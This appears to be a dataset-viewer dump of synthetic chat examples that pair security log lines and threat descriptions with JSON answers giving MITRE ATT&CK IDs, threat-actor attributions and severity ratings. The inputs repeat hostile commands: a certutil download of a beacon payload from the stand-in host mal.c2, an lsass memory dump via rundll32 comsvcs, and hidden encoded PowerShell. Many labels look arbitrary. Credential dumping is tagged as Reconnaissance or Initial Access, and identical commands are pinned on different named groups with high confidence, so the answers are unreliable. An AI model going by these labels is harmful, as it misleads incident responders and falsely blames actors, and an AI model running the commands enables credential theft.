messages listlengths 2 2 |
|---|
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-9KGXHUR58T)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Collection, Reconnaissance",
"role": "user"
},
{
"content": "{\"sever... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: C:\\Windows\\System32\\sethc.exe",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546.008\", \"T1546\"]}",
"role": "assistant"
}
] |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: StreamEx has the ability to scan for security tools such as firewalls and antivirus tools.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1518.001\", \"T1518\"]}",
"role":... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-Y0Y2K1RQUQ)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Privilege Escalation, Persistence",
"role": "user"
},
{
"content": "{\... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: PlugX also has a module to change service configurations as well as start, control, and delete services.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1543.003\", \"T1543\"]}"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3761 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, WMI, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidence\": ... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Identify potentially malicious software that may be used to taint content or may result from it and audit and/or block the unknown programs by using application control tools, like AppLocker, or Software Restricti... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, TLS, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered S... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.29.113.190",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0002\"], \"tec... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 789 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.14.128.217",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0001\"], \"technique... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Downloading stylesheets allows for emended JavaScript and VBS to be run from within them, at which point any type of malware could be staged and run quite easily",
"role": "user"
},
{
"content": "{\"tacti... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 586 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.105.58.52",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\"], \"techniqu... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-BIYKF13MHK)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"content": "{\"severity\": \... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: When we converted the dates in the file strings from the Solar Hijri calendar to the Gregorian one, we found that they were close to the compilation times of the executables and also close to when Cadelle’s targets were initially compr... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2334 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.146.174.175",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA0003\", \"TA0008\"], \"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-TJF9BQIH1P)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Exfiltration, Impact, Persistence",
"role": "user"
},
{
"conte... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-S8JMWZTDA0)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Collection, Execution",
"role": "user"
},
{
"content": "{\"severity... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3772 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.105.13.147",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-JUNCABHCYA)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Collection",
"role": "user"
},
{
"content": "{\"severity\": \"Cri... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-TRA8959OX4)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation",
"role": "user"
},
{
"content": "{\"severity\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-2QWBVL15B5)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Collection, Discovery",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2817 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, WMI, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\": \... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, TLS, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"con... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.50.194.160",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-78UGQS9CCI)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Persistence, Lateral Movement",
"role": "user"
},
{
"cont... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.23.113.104",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA000... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: After decoding their C2 server IP addresses, from obfuscated strings, both trojans will attempt to collect host information and send it to the C2 server.",
"role": "user"
},
{
"content": "{\"tactics\": [\... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 1297 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.122.138.237",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\"], \"techn... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"co... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, Fileless, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: QakBot has the ability to enumerate windows on a compromised host.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1010\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: WarzoneRAT has the capability to install a live and offline keylogger, including through the use of the GetAsyncKeyState Windows API.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\":... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Tropic Trooper's backdoor has communicated to the C2 over the DNS protocol.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071.004\", \"T1071\"]}",
"role": "assistant"
... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T15... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: ChangeServiceConfigW",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1489\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: JA3 Spoof, TLS, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidence\": \"High... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-BIVSYSW4GU)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Execution, Privilege Escalation, Command and Control",
"role": "user"
},... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.",
"role": "user"
},
{
"content": "{\"tactics\": [\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-74X3GCON88)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance, Privilege Escalation, Credential Access",
"role": "user"
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-23PU5VFWW6)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Impact, Command and Control",
"role": "user"
},
{
"content... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confide... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: JA3 Spoof, TLS, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\", \"confidenc... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-BU6IIX579N)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Command and Control, Execution",
"role": "user"
},
{
"conte... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-097TOFH6CL)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Defense Evasion",
"role": "user"
},
{
"content": "{\"severity\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, JA3 Spoof, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confidence\": \"High... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-GCFVOEX2GP)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Impact, Collection, Credential Access",
"role": "user"
},
{
... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.70.3.52",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T153... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Operation Wocao has used a custom protocol for command and control.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1095\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidenc... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Sys10 uses an XOR 0x1 loop to encrypt its C2 domain.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.001\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-Z5XIBI8PUP)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "{\"severity\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, LOLBin, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"co... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3446 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, JA3 Spoof, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confid... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-46C7W9WDHC)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Command and Control, Execution, Impact",
"role": "user"
},
{
"... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.",
"role": "user"
},
{... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-HXOU256BN6)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Impact, Collection, Privilege Escalation",
"role": "user"
},
{
"cont... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes.",
"role... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: FlawedGrace encrypts its C2 configuration files with AES in CBC mode.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.87.211.31",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techn... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Fileless, LOLBin, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"confidence\": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-1TVX7MF9JR)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Exfiltration, Command and Control",
"role": "user"
},
{
"con... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1601\", \"T1601.00... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.20.173.129",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1021... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1056 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.182.248.101",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniqu... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-7MVGH7LZ8W)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Discovery",
"role": "user"
},
{
"content": "{\... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.42.248.26",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA0011\",... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: COM and execution in same sentence",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021.003\", \"T1021\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.97.203.121",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"t... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: FIN10 has used batch scripts and scheduled tasks to delete critical system files.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}",
"role": "a... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.111.62.131",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"technique... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2867 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.93.86.239",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1570\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-EGIUPIJQUO)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Collection, Persistence, Credential Access",
"role": "user"
},
{... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-SKYCVXPAH2)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Impact",
"role": "user"
},
{
"content": "{\"severity\": \"Criti... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-SBWH1Z7L4R)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation, Command and Control, Reconnaissance",
"role": "user"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.19.135.96",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-MO6GC24HUU)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Command and Control, Impact",
"role": "user"
},
{
"content": "{\"se... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.90.98.144",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0005\", \"TA0001\"], \"te... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3872 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.83.160.9",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: LoadPackagedLibrary()",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1106\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: The startup folder path for all users is C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 976 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-EG36CD6833)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Command and Control",
"role": "user"
},
{
"content": "{\"severity\": \... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.174.105.193",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA0005\", \"TA0040\"], \"technique... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.35.154.43",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techn... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-XB8LOPRSUB)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Execution",
"role": "user"
},
{
"content": "{\"severity\": \"H... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1775 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, TLS, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confiden... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.87.222.8",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"te... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1821 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, LOLBin, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confid... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: The macro saves the chkSrv.vbs script to the system, which is responsible for running the IntelSecurityAssistManager.exe payload (OopsIE Trojan) and cleaning up the installation by deleting the two scheduled tasks, t... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\", ... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled, as this is often equivalent to having a local administrator account with the same password on all systems.",
... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.103.222.29",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-TSZSWC6Y50)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Credential Access, Collection",
"role": "user"
},
{
"conten... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Base64, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confide... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.191.177.207",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\", \"TA0043\", \"TA0003\"], \"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-T0HRW3IR5T)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Command and Control, Privilege Escalation",
"role": "user"
},
{
"conten... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: JA3 Spoof, Fileless, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\": \"Hig... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Fileless, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spide... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.